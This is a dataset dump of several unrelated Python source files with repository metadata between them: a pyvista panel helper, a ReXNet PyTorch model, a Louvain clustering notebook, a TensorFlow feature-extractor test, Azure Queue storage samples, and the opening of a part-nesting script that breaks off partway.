display.display_html(disp)
def show_panel(plotter, return_viewer):
"""Take the active renderer(s) from a plotter and show them using ``panel``."""
try:
import panel as pn
except ImportError: # pragma: no cover
raise ImportError('Install ``panel`` to use this feature')
# check if panel extension has been set
if not PANEL_EXTENSION_SET[0]:
pn.extension('vtk')
PANEL_EXTENSION_SET[0] = True
# only set window size if explicitly set within the plotter
sizing = {}
if not plotter._window_size_unset:
width, height = plotter.window_size
sizing = {'width': width,
'height': height}
axes_enabled = plotter.renderer.axes_enabled
pan = pn.panel(plotter.ren_win,
sizing_mode='stretch_width',
orientation_widget=axes_enabled,
enable_keybindings=False, **sizing)
# if plotter.renderer.axes_enabled:
# pan.axes = build_panel_axes()
if hasattr(plotter.renderer, 'cube_axes_actor'):
pan.axes = build_panel_bounds(plotter.renderer.cube_axes_actor)
if return_viewer:
return pan
display.display_html(pan)
def build_panel_bounds(actor):
"""Build a panel bounds actor using the plotter cube_axes_actor."""
bounds = {}
n_ticks = 5
if actor.GetXAxisVisibility():
xmin, xmax = actor.GetXRange()
bounds['xticker'] = {'ticks': np.linspace(xmin, xmax, n_ticks)}
if actor.GetYAxisVisibility():
ymin, ymax = actor.GetYRange()
bounds['yticker'] = {'ticks': np.linspace(ymin, ymax, n_ticks)}
if actor.GetZAxisVisibility():
zmin, zmax = actor.GetZRange()
bounds['zticker'] = {'ticks': np.linspace(zmin, zmax, n_ticks)}
bounds['origin'] = [xmin, ymin, zmin]
bounds['grid_opacity'] = 0.5
bounds['show_grid'] = True
bounds['digits'] = 3
bounds['fontsize'] = actor.GetLabelTextProperty(0).GetFontSize()
return bounds
| 32.059524 | 95 | 0.657631 |
4a27e81efe57fc33ebb3711a55ff640c858c9263 | 6,282 | py | Python | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | ["MIT"] | null | null | null | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | ["MIT"] | null | null | null | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | ["MIT"] | null | null | null |
import torch
import torch.nn as nn
from math import ceil
USE_MEMORY_EFFICIENT_SiLU = True
if USE_MEMORY_EFFICIENT_SiLU:
@torch.jit.script
def silu_fwd(x):
return x.mul(torch.sigmoid(x))
@torch.jit.script
def silu_bwd(x, grad_output):
x_sigmoid = torch.sigmoid(x)
return grad_output * (x_sigmoid * (1. + x * (1. - x_sigmoid)))
class SiLUJitImplementation(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return silu_fwd(x)
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_tensors[0]
return silu_bwd(x, grad_output)
def silu(x, inplace=False):
return SiLUJitImplementation.apply(x)
else:
def silu(x, inplace=False):
return x.mul_(x.sigmoid()) if inplace else x.mul(x.sigmoid())
class SiLU(nn.Module):
def __init__(self, inplace=True):
super(SiLU, self).__init__()
self.inplace = inplace
def forward(self, x):
return silu(x, self.inplace)
def ConvBNAct(out, in_channels, channels, kernel=1, stride=1, pad=0,
num_group=1, active=True, relu6=False):
out.append(nn.Conv2d(in_channels, channels, kernel,
stride, pad, groups=num_group, bias=False))
out.append(nn.BatchNorm2d(channels))
if active:
out.append(nn.ReLU6(inplace=True) if relu6 else nn.ReLU(inplace=True))
def ConvBNSiLU(out, in_channels, channels, kernel=1, stride=1, pad=0, num_group=1):
out.append(nn.Conv2d(in_channels, channels, kernel,
stride, pad, groups=num_group, bias=False))
out.append(nn.BatchNorm2d(channels))
out.append(SiLU(inplace=True))
class SE(nn.Module):
def __init__(self, in_channels, channels, se_ratio=12):
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(in_channels, channels // se_ratio, kernel_size=1, padding=0),
nn.BatchNorm2d(channels // se_ratio),
nn.ReLU(inplace=True),
nn.Conv2d(channels // se_ratio, channels, kernel_size=1, padding=0),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.fc(y)
return x * y
class LinearBottleneck(nn.Module):
def __init__(self, in_channels, channels, t, stride, use_se=True, se_ratio=12,
**kwargs):
super(LinearBottleneck, self).__init__(**kwargs)
self.use_shortcut = stride == 1 and in_channels <= channels
self.in_channels = in_channels
self.out_channels = channels
out = []
if t != 1:
dw_channels = in_channels * t
ConvBNSiLU(out, in_channels=in_channels, channels=dw_channels)
else:
dw_channels = in_channels
ConvBNAct(out, in_channels=dw_channels, channels=dw_channels, kernel=3, stride=stride, pad=1,
num_group=dw_channels, active=False)
if use_se:
out.append(SE(dw_channels, dw_channels, se_ratio))
out.append(nn.ReLU6())
ConvBNAct(out, in_channels=dw_channels, channels=channels, active=False, relu6=True)
self.out = nn.Sequential(*out)
def forward(self, x):
out = self.out(x)
if self.use_shortcut:
out[:, 0:self.in_channels] += x
return out
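    # Shape sketch (illustrative; the sizes are arbitrary examples): the residual is
    # only added onto the first ``in_channels`` feature maps because the block widens
    # the channel dimension.
    #
    #   block = LinearBottleneck(in_channels=16, channels=27, t=6, stride=1)
    #   block(torch.randn(2, 16, 56, 56)).shape   # -> torch.Size([2, 27, 56, 56])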
class ReXNetV1(nn.Module):
def __init__(self, input_ch=16, final_ch=180, width_mult=1.0, depth_mult=1.0, classes=1000,
use_se=True,
se_ratio=12,
dropout_ratio=0.2,
bn_momentum=0.9):
super(ReXNetV1, self).__init__()
layers = [1, 2, 2, 3, 3, 5]
strides = [1, 2, 2, 2, 1, 2]
use_ses = [False, False, True, True, True, True]
layers = [ceil(element * depth_mult) for element in layers]
strides = sum([[element] + [1] * (layers[idx] - 1)
for idx, element in enumerate(strides)], [])
if use_se:
use_ses = sum([[element] * layers[idx] for idx, element in enumerate(use_ses)], [])
else:
use_ses = [False] * sum(layers[:])
ts = [1] * layers[0] + [6] * sum(layers[1:])
self.depth = sum(layers[:]) * 3
stem_channel = 32 / width_mult if width_mult < 1.0 else 32
inplanes = input_ch / width_mult if width_mult < 1.0 else input_ch
features = []
in_channels_group = []
channels_group = []
# The following channel configuration is a simple instance to make each layer become an expand layer.
for i in range(self.depth // 3):
if i == 0:
in_channels_group.append(int(round(stem_channel * width_mult)))
channels_group.append(int(round(inplanes * width_mult)))
else:
in_channels_group.append(int(round(inplanes * width_mult)))
inplanes += final_ch / (self.depth // 3 * 1.0)
channels_group.append(int(round(inplanes * width_mult)))
ConvBNSiLU(features, 3, int(round(stem_channel * width_mult)), kernel=3, stride=2, pad=1)
for block_idx, (in_c, c, t, s, se) in enumerate(zip(in_channels_group, channels_group, ts, strides, use_ses)):
features.append(LinearBottleneck(in_channels=in_c,
channels=c,
t=t,
stride=s,
use_se=se, se_ratio=se_ratio))
pen_channels = int(1280 * width_mult)
ConvBNSiLU(features, c, pen_channels)
features.append(nn.AdaptiveAvgPool2d(1))
self.features = nn.Sequential(*features)
self.output = nn.Sequential(
nn.Dropout(dropout_ratio),
nn.Conv2d(pen_channels, classes, 1, bias=True))
def forward(self, x):
x = self.features(x)
x = self.output(x).squeeze()
return x
if __name__ == '__main__':
model = ReXNetV1(width_mult=1.0)
out = model(torch.randn(2, 3, 224, 224))
loss = out.sum()
loss.backward()
print('Checked a single forward/backward iteration')
| 34.327869 | 118 | 0.587233 |
4a27e8a417ebb07878a27c45130fce57fd370802 | 10,164 | py | Python | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | ["BSD-3-Clause"] | null | null | null | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | ["BSD-3-Clause"] | null | null | null | notebooks/81.3-BDP-community.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | ["BSD-3-Clause"] | null | null | null |
#%%
import os
import pickle
import warnings
from operator import itemgetter
from pathlib import Path
from timeit import default_timer as timer
import colorcet as cc
import community as cm
import matplotlib.colors as mplc
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pandas as pd
import seaborn as sns
from joblib import Parallel, delayed
from matplotlib.cm import ScalarMappable
from sklearn.model_selection import ParameterGrid
from graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed
from graspy.plot import gridplot, heatmap, pairplot
from graspy.utils import symmetrize
from src.data import load_everything, load_metagraph, load_networkx
from src.embed import lse, preprocess_graph
from src.graph import MetaGraph, preprocess
from src.hierarchy import signal_flow
from src.io import savefig, saveobj, saveskels, savecsv
from src.utils import get_blockmodel_df, get_sbm_prob
from src.visualization import (
CLASS_COLOR_DICT,
CLASS_IND_DICT,
barplot_text,
bartreeplot,
draw_networkx_nice,
get_color_dict,
get_colors,
palplot,
probplot,
sankey,
screeplot,
stacked_barplot,
random_names,
)
FNAME = os.path.basename(__file__)[:-3]
print(FNAME)
# %% [markdown]
# # Parameters
BRAIN_VERSION = "2020-03-02"
BLIND = True
SAVEFIGS = False
SAVESKELS = False
SAVEOBJS = True
np.random.seed(9812343)
sns.set_context("talk")
def stashfig(name, **kws):
savefig(name, foldername=FNAME, save_on=True, **kws)
plt.close()
def stashcsv(df, name, **kws):
savecsv(df, name, foldername=FNAME, save_on=True, **kws)
def stashskel(name, ids, labels, colors=None, palette=None, **kws):
saveskels(
name,
ids,
labels,
colors=colors,
palette=None,
foldername=FNAME,
save_on=SAVESKELS,
**kws,
)
def stashobj(obj, name, **kws):
saveobj(obj, name, foldername=FNAME, save_on=SAVEOBJS, **kws)
def to_minigraph(
adj,
labels,
drop_neg=True,
remove_diag=True,
size_scaler=1,
use_counts=False,
use_weights=True,
color_map=None,
):
# convert the adjacency and a partition to a minigraph based on SBM probs
prob_df = get_blockmodel_df(
adj, labels, return_counts=use_counts, use_weights=use_weights
)
if drop_neg and ("-1" in prob_df.index):
prob_df.drop("-1", axis=0, inplace=True)
prob_df.drop("-1", axis=1, inplace=True)
if remove_diag:
adj = prob_df.values
adj -= np.diag(np.diag(adj))
prob_df.data = prob_df
g = nx.from_pandas_adjacency(prob_df, create_using=nx.DiGraph())
uni_labels, counts = np.unique(labels, return_counts=True)
# add size attribute base on number of vertices
size_map = dict(zip(uni_labels, size_scaler * counts))
nx.set_node_attributes(g, size_map, name="Size")
# add signal flow attribute (for the minigraph itself)
mini_adj = nx.to_numpy_array(g, nodelist=uni_labels)
node_signal_flow = signal_flow(mini_adj)
sf_map = dict(zip(uni_labels, node_signal_flow))
nx.set_node_attributes(g, sf_map, name="Signal Flow")
# add spectral properties
sym_adj = symmetrize(mini_adj)
n_components = 10
latent = AdjacencySpectralEmbed(n_components=n_components).fit_transform(sym_adj)
for i in range(n_components):
latent_dim = latent[:, i]
lap_map = dict(zip(uni_labels, latent_dim))
nx.set_node_attributes(g, lap_map, name=f"AdjEvec-{i}")
# add spring layout properties
pos = nx.spring_layout(g)
spring_x = {}
spring_y = {}
for key, val in pos.items():
spring_x[key] = val[0]
spring_y[key] = val[1]
nx.set_node_attributes(g, spring_x, name="Spring-x")
nx.set_node_attributes(g, spring_y, name="Spring-y")
# add colors
if color_map is None:
color_map = dict(zip(uni_labels, cc.glasbey_light))
nx.set_node_attributes(g, color_map, name="Color")
return g
def adjust_partition(partition, class_labels):
adjusted_partition = partition.copy().astype(str)
sens_classes = [
"sens-AN",
"sens-MN",
"sens-ORN",
"sens-PaN",
"sens-photoRh5",
"sens-photoRh6",
"sens-thermo;AN",
"sens-vtd",
]
for s in sens_classes:
inds = np.where(class_labels == s)[0]
adjusted_partition[inds] = s
return adjusted_partition
def run_louvain(g_sym, res, skeleton_labels):
out_dict = cm.best_partition(g_sym, resolution=res)
modularity = cm.modularity(out_dict, g_sym)
partition = np.array(itemgetter(*skeleton_labels)(out_dict))
part_unique, part_count = np.unique(partition, return_counts=True)
for uni, count in zip(part_unique, part_count):
if count < 3:
inds = np.where(partition == uni)[0]
partition[inds] = -1
return partition, modularity
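# Usage sketch (illustrative; the resolution value is an arbitrary example):
#
#   partition, modularity = run_louvain(g_sym, 0.5, skeleton_labels)
#   np.unique(partition)   # community labels; clusters with <3 nodes are set to -1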
def augment_classes(class_labels, lineage_labels, fill_unk=True):
if fill_unk:
classlin_labels = class_labels.copy()
fill_inds = np.where(class_labels == "unk")[0]
classlin_labels[fill_inds] = lineage_labels[fill_inds]
used_inds = np.array(list(CLASS_IND_DICT.values()))
unused_inds = np.setdiff1d(range(len(cc.glasbey_light)), used_inds)
lineage_color_dict = dict(
zip(np.unique(lineage_labels), np.array(cc.glasbey_light)[unused_inds])
)
color_dict = {**CLASS_COLOR_DICT, **lineage_color_dict}
hatch_dict = {}
for key, val in color_dict.items():
if key[0] == "~":
hatch_dict[key] = "//"
else:
hatch_dict[key] = ""
else:
color_dict = "class"
hatch_dict = None
return classlin_labels, color_dict, hatch_dict
def run_experiment(
graph_type=None, threshold=None, res=None, binarize=None, seed=None, param_key=None
):
# common names
if BLIND:
basename = f"{param_key}-"
title = param_key
else:
basename = f"louvain-res{res}-t{threshold}-{graph_type}-"
title = f"Louvain, {graph_type}, res = {res}, threshold = {threshold}"
np.random.seed(seed)
# load and preprocess the data
mg = load_metagraph(graph_type, version=BRAIN_VERSION)
mg = preprocess(
mg,
threshold=threshold,
sym_threshold=True,
remove_pdiff=True,
binarize=binarize,
)
adj = mg.adj
adj = symmetrize(adj, method="avg")
mg = MetaGraph(adj, mg.meta)
g_sym = mg.g
skeleton_labels = np.array(list(g_sym.nodes()))
partition, modularity = run_louvain(g_sym, res, skeleton_labels)
partition_series = pd.Series(partition, index=skeleton_labels)
partition_series.name = param_key
if SAVEFIGS:
# get out some metadata
class_label_dict = nx.get_node_attributes(g_sym, "Merge Class")
class_labels = np.array(itemgetter(*skeleton_labels)(class_label_dict))
lineage_label_dict = nx.get_node_attributes(g_sym, "lineage")
lineage_labels = np.array(itemgetter(*skeleton_labels)(lineage_label_dict))
lineage_labels = np.vectorize(lambda x: "~" + x)(lineage_labels)
classlin_labels, color_dict, hatch_dict = augment_classes(
class_labels, lineage_labels
)
# TODO then sort all of them by proportion of sensory/motor
# barplot by merge class and lineage
_, _, order = barplot_text(
partition,
classlin_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=True,
figsize=(24, 18),
title=title,
hatch_dict=hatch_dict,
return_order=True,
)
stashfig(basename + "barplot-mergeclasslin-props")
category_order = np.unique(partition)[order]
fig, axs = barplot_text(
partition,
class_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=True,
figsize=(24, 18),
title=title,
hatch_dict=None,
category_order=category_order,
)
stashfig(basename + "barplot-mergeclass-props")
fig, axs = barplot_text(
partition,
class_labels,
color_dict=color_dict,
plot_proportions=False,
norm_bar_width=False,
figsize=(24, 18),
title=title,
hatch_dict=None,
category_order=category_order,
)
stashfig(basename + "barplot-mergeclass-counts")
# TODO add gridmap
counts = False
weights = False
prob_df = get_blockmodel_df(
mg.adj, partition, return_counts=counts, use_weights=weights
)
prob_df = prob_df.reindex(category_order, axis=0)
prob_df = prob_df.reindex(category_order, axis=1)
probplot(
100 * prob_df, fmt="2.0f", figsize=(20, 20), title=title, font_scale=0.7
)
stashfig(basename + f"probplot-counts{counts}-weights{weights}")
return partition_series, modularity
# %% [markdown]
# #
np.random.seed(8888889)
n_replicates = 20
param_grid = {
"graph_type": ["G"],
"threshold": [0, 1, 2, 3],
"res": [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8],
"binarize": [True, False],
}
params = list(ParameterGrid(param_grid))
seeds = np.random.randint(1e8, size=n_replicates * len(params))
param_keys = random_names(len(seeds))
rep_params = []
for i, seed in enumerate(seeds):
p = params[i % len(params)].copy()
p["seed"] = seed
p["param_key"] = param_keys[i]
rep_params.append(p)
# %% [markdown]
# #
print("\n\n\n\n")
print(f"Running {len(rep_params)} jobs in total")
print("\n\n\n\n")
outs = Parallel(n_jobs=-2, verbose=10)(delayed(run_experiment)(**p) for p in rep_params)
partitions, modularities = list(zip(*outs))
# %% [markdown]
# #
block_df = pd.concat(partitions, axis=1, ignore_index=False)
stashcsv(block_df, "block-labels")
param_df = pd.DataFrame(rep_params)
param_df["modularity"] = modularities
stashcsv(param_df, "parameters")
| 29.806452 | 88 | 0.652696 |
4a27e8c8d649c4cb9ae961bffafc7ad824b63b25 | 5,411 | py | Python | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | gujralsanyam22/models | d96f8f043dbe2b5ca8ea1785f57df8faf68d8875 | ["Apache-2.0"] | 82,518 | 2016-02-05T12:07:23.000Z | 2022-03-31T23:09:47.000Z | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | yangxl-2014-fe/models | 11ea5237818e791a5717716d5413977f4c4db1e3 | ["Apache-2.0"] | 9,021 | 2016-03-08T01:02:05.000Z | 2022-03-31T08:06:35.000Z | research/object_detection/models/embedded_ssd_mobilenet_v1_feature_extractor_tf1_test.py | yangxl-2014-fe/models | 11ea5237818e791a5717716d5413977f4c4db1e3 | ["Apache-2.0"] | 54,341 | 2016-02-06T17:19:55.000Z | 2022-03-31T10:27:44.000Z |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for embedded_ssd_mobilenet_v1_feature_extractor."""
import unittest
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.models import embedded_ssd_mobilenet_v1_feature_extractor
from object_detection.models import ssd_feature_extractor_test
from object_detection.utils import tf_version
@unittest.skipIf(tf_version.is_tf2(), 'Skipping TF1.X only test.')
class EmbeddedSSDMobileNetV1FeatureExtractorTest(
ssd_feature_extractor_test.SsdFeatureExtractorTestBase):
def _create_feature_extractor(self, depth_multiplier, pad_to_multiple,
is_training=True):
"""Constructs a new feature extractor.
Args:
depth_multiplier: float depth multiplier for feature extractor
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
is_training: whether the network is in training mode.
Returns:
an ssd_meta_arch.SSDFeatureExtractor object.
"""
min_depth = 32
return (embedded_ssd_mobilenet_v1_feature_extractor.
EmbeddedSSDMobileNetV1FeatureExtractor(
is_training, depth_multiplier, min_depth, pad_to_multiple,
self.conv_hyperparams_fn,
override_base_feature_extractor_hyperparams=True))
def test_extract_features_returns_correct_shapes_256(self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_with_dynamic_inputs(self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shapes_with_dynamic_inputs(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_enforcing_min_depth(self):
image_height = 256
image_width = 256
depth_multiplier = 0.5**12
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 32), (2, 8, 8, 32), (2, 4, 4, 32),
(2, 2, 2, 32), (2, 1, 1, 32)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_returns_correct_shapes_with_pad_to_multiple_of_1(
self):
image_height = 256
image_width = 256
depth_multiplier = 1.0
pad_to_multiple = 1
expected_feature_map_shape = [(2, 16, 16, 512), (2, 8, 8, 1024),
(2, 4, 4, 512), (2, 2, 2, 256),
(2, 1, 1, 256)]
self.check_extract_features_returns_correct_shape(
2, image_height, image_width, depth_multiplier, pad_to_multiple,
expected_feature_map_shape)
def test_extract_features_raises_error_with_pad_to_multiple_not_1(self):
depth_multiplier = 1.0
pad_to_multiple = 2
with self.assertRaises(ValueError):
_ = self._create_feature_extractor(depth_multiplier, pad_to_multiple)
def test_extract_features_raises_error_with_invalid_image_size(self):
image_height = 128
image_width = 128
depth_multiplier = 1.0
pad_to_multiple = 1
self.check_extract_features_raises_error_with_invalid_image_size(
image_height, image_width, depth_multiplier, pad_to_multiple)
def test_preprocess_returns_correct_value_range(self):
image_height = 256
image_width = 256
depth_multiplier = 1
pad_to_multiple = 1
test_image = np.random.rand(4, image_height, image_width, 3)
feature_extractor = self._create_feature_extractor(depth_multiplier,
pad_to_multiple)
preprocessed_image = feature_extractor.preprocess(test_image)
self.assertTrue(np.all(np.less_equal(np.abs(preprocessed_image), 1.0)))
def test_variables_only_created_in_scope(self):
depth_multiplier = 1
pad_to_multiple = 1
scope_name = 'MobilenetV1'
self.check_feature_extractor_variables_under_scope(
depth_multiplier, pad_to_multiple, scope_name)
if __name__ == '__main__':
tf.test.main()
| 40.684211 | 80 | 0.692293 |
4a27e92ab64631535ed5120c681f67b653628056 | 8,765 | py | Python | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | queue_advanced_samples.py | tamram/storage-queue-python-getting-started | a99597814950beb79397ab8b4abd82f89e55f5e0 | [
"MIT"
] | null | null | null | #----------------------------------------------------------------------------------
# Microsoft Developer & Platform Evangelism
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
#----------------------------------------------------------------------------------
# The example companies, organizations, products, domain names,
# e-mail addresses, logos, people, places, and events depicted
# herein are fictitious. No association with any real company,
# organization, product, domain name, email address, logo, person,
# places, or events is intended or should be inferred.
#----------------------------------------------------------------------------------
from azure.storage.common import CloudStorageAccount, AccessPolicy
from azure.storage.queue import Queue, QueueService, QueueMessage, QueuePermissions
from azure.storage.common import CorsRule, Logging, Metrics, RetentionPolicy
from azure.common import AzureException
import config
from random_data import RandomData
import datetime
# -------------------------------------------------------------
# <summary>
# Azure Queue Service Sample - The Queue Service provides reliable messaging for workflow processing and for communication
# between loosely coupled components of cloud services. This sample demonstrates how to perform common tasks including
# inserting, peeking, getting and deleting queue messages, as well as creating and deleting queues.
#
# Documentation References:
# - What is a Storage Account - http://azure.microsoft.com/en-us/documentation/articles/storage-whatis-account/
# - Getting Started with Queues - https://azure.microsoft.com/en-us/documentation/articles/storage-python-how-to-use-queue-storage/
# - Queue Service Concepts - http://msdn.microsoft.com/en-us/library/dd179353.aspx
# - Queue Service REST API - http://msdn.microsoft.com/en-us/library/dd179363.aspx
# - Queue Service Python API - http://azure.github.io/azure-storage-python/ref/azure.storage.queue.html
# - Storage Emulator - http://msdn.microsoft.com/en-us/library/azure/hh403989.aspx
# </summary>
# -------------------------------------------------------------
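# Typical driver sketch (illustrative, not part of the original sample; assumes config.py
# exposes the account name/key names used below):
#   account = CloudStorageAccount(is_emulated=True) if config.IS_EMULATED else \
#       CloudStorageAccount(account_name=config.ACCOUNT_NAME, account_key=config.ACCOUNT_KEY)
#   QueueAdvancedSamples().run_all_samples(account)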
class QueueAdvancedSamples():
def __init__(self):
self.random_data = RandomData()
# Runs all samples for Azure Storage Queue service.
# Input Arguments:
# account - CloudStorageAccount to use for running the samples
def run_all_samples(self, account):
try:
print('Azure Storage Advanced Queue samples - Starting.')
# create a new queue service that can be passed to all methods
queue_service = account.create_queue_service()
print('\n\n* List queues *\n')
self.list_queues(queue_service)
print('\n\n* Set cors Rules *\n')
self.set_cors_rules(queue_service)
print('\n\n* ACL operations *\n')
self.queue_acl_operations(queue_service)
print('\n\n* Set service logging and metrics properties *\n')
self.set_service_properties(queue_service)
print('\n\n* Set queue metadata *\n')
self.metadata_operations(queue_service)
except Exception as e:
if (config.IS_EMULATED):
print('Error occurred in the sample. Please make sure the Storage emulator is running.', e)
else:
print('Error occurred in the sample. Please make sure the account name and key are correct.', e)
finally:
print('\nAzure Storage Advanced Queue samples - Completed\n')
# Manage queues including, creating, listing and deleting
def list_queues(self, queue_service):
queue_prefix = "queuesample" + self.random_data.get_random_name(6)
try:
print('1. Create multiple queues with prefix: ', queue_prefix)
for i in range(5):
queue_service.create_queue(queue_prefix + str(i))
print('2. List queues with prefix: ', queue_prefix)
queues = queue_service.list_queues(queue_prefix)
for queue in queues:
print(' Queue name:' + queue.name)
finally:
print('3. Delete queues with prefix:' + queue_prefix)
for i in range(5):
if queue_service.exists(queue_prefix + str(i)):
queue_service.delete_queue(queue_prefix + str(i))
print("List queues sample completed")
# Manage CORS rules
def set_cors_rules(self, queue_service):
cors_rule = CorsRule(
allowed_origins=['*'],
allowed_methods=['POST', 'GET'],
allowed_headers=['*'],
exposed_headers=['*'],
max_age_in_seconds=3600)
try:
print('1. Get Cors Rules')
original_cors_rules = queue_service.get_queue_service_properties().cors
print('2. Overwrite Cors Rules')
queue_service.set_queue_service_properties(cors=[cors_rule])
finally:
print('3. Revert Cors Rules back the original ones')
#reverting cors rules back to the original ones
queue_service.set_queue_service_properties(cors=original_cors_rules)
print("CORS sample completed")
# Manage properties of the Queue service, including logging and metrics settings, and the default service version.
def set_service_properties(self, queue_service):
try:
print('1. Get Queue service properties')
            props = queue_service.get_queue_service_properties()
retention = RetentionPolicy(enabled=True, days=5)
logging = Logging(delete=True, read=False, write=True, retention_policy=retention)
hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=retention)
minute_metrics = Metrics(enabled=False)
            print('2. Overwrite Queue service properties')
queue_service.set_queue_service_properties(logging=logging, hour_metrics=hour_metrics, minute_metrics=minute_metrics)
finally:
print('3. Revert Queue service properties back to the original ones')
queue_service.set_queue_service_properties(logging=props.logging, hour_metrics=props.hour_metrics, minute_metrics=props.minute_metrics)
print('4. Set Queue service properties completed')
# Manage metadata of a queue
def metadata_operations(self, queue_service):
queue_name = 'queue' + self.random_data.get_random_name(6)
try:
# Create a new queue
print('1. Create a queue with custom metadata - ' + queue_name)
queue_service.create_queue(queue_name, {'category':'azure-storage', 'type': 'queue-sample'})
# Get all the queue metadata
print('2. Get queue metadata')
metadata = queue_service.get_queue_metadata(queue_name)
print(' Metadata:')
for key in metadata:
print(' ' + key + ':' + metadata[key])
finally:
# Delete the queue
print("3. Delete Queue")
if queue_service.exists(queue_name):
queue_service.delete_queue(queue_name)
# Manage access policy of a queue
def queue_acl_operations(self, queue_service):
queue_name = 'aclqueue' + self.random_data.get_random_name(6)
try:
print('1. Create a queue with name - ' + queue_name)
queue_service.create_queue(queue_name)
print('2. Set access policy for queue')
access_policy = AccessPolicy(permission=QueuePermissions.READ,
expiry=datetime.datetime.utcnow() + datetime.timedelta(hours=1))
identifiers = {'id': access_policy}
queue_service.set_queue_acl(queue_name, identifiers)
print('3. Get access policy from queue')
acl = queue_service.get_queue_acl(queue_name)
print('4. Clear access policy in queue')
# Clear
queue_service.set_queue_acl(queue_name)
finally:
print('5. Delete queue')
if queue_service.exists(queue_name):
queue_service.delete_queue(queue_name)
print("Queue ACL operations sample completed") | 44.045226 | 147 | 0.616885 |
4a27e9b25c4342286aea0f16006d90f6d8b0fda9 | 140 | py | Python | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_bard/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from .na_bard_top import *
from .na_bard_jng import *
from .na_bard_mid import *
from .na_bard_bot import *
from .na_bard_sup import *
| 23.333333 | 27 | 0.75 |
4a27e9cd0daf7177376030759c92fb92f6edf18f | 1,201 | py | Python | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | 1 | 2022-02-15T19:59:59.000Z | 2022-02-15T19:59:59.000Z | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | null | null | null | test_nfp.py | zhuyuanxiang/irregular_packing-1 | 5de4bf7ca51b6263ef44c1c7a6495e8b215e900c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import ast
import pandas as pd
from nfp_function import content_loop_rate
from nfp_function import Nester
from settings import BIN_CUT_BIG
from settings import BIN_NORMAL
from settings import BIN_WIDTH
from settings import LOOP_TIME
lingjian = pd.read_csv(r'.\L0002_lingjian.csv')
if __name__ == '__main__':
n = Nester()
s = [ast.literal_eval(contour) for contour in lingjian['外轮廓']]
n.add_objects(
# [ [ [0,0],[0,20],[20,0] ],
# [ [20,0],[20,10],[30,10],[30,0] ],
# [[10,0],[20,0],[20,10],[10,10]]
# ]
# [
# [[10,0],[20,0],[20,10],[10,10]],
# [[10,20],[20,20],[15,30]],
